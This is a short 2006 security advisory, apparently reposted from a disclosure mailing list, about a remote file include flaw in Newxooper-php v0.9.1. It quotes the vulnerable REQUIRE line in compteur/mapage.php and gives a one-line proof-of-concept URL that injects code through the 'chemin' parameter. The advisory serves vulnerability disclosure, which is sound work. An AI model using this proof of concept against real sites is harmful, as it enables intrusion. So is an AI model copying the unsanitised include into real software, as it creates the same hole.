Security Advisory: Newxooper-php v0.9.1(chemin) Remote File Include Vulnerabilty

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include
  TextSend <= 1.5 (config/sender.
php) Remote File Include Vulnerability
  PowerClan <= 1.14a (footer.inc.
php) Remote File Include Vulnerability
  PgmReloaded <= 0.8.5 Multiple Remote File Include Vulnerabilities

From: Dr Max Virus <drmaxvirus_(at)_w.cn>
Date: 21.12.2006
Subject: Newxooper-php v0.9.1(chemin) Remote File Include Vulnerabilty

#################################################################################
##########
#Newxooper-php v0.9.1(chemin) Remote File Include Vulnerabilty #
#Download:http://www.easy-script.com/newxoope-091.zip #
#################################################################################
##########
#Author:Dr Max Virus #
#Location:Egypt #
#################################################################################
##########
#Bug in compteur/mapage.php #
#In Line:37 #
#Vul Code: #
#REQUIRE ("$chemin/compteur/mapage.txt"); #
#################################################################################
##########
#POC: #
#http://[target]/[path]/compteur/mapage.php?chemin=Evil Code #
#################################################################################
##########
#Thx:str0ke & ajann &All friends #
#Special Gr33ts:AsianEagle & The master & Kacper & Hotturk #
#################################################################################
##########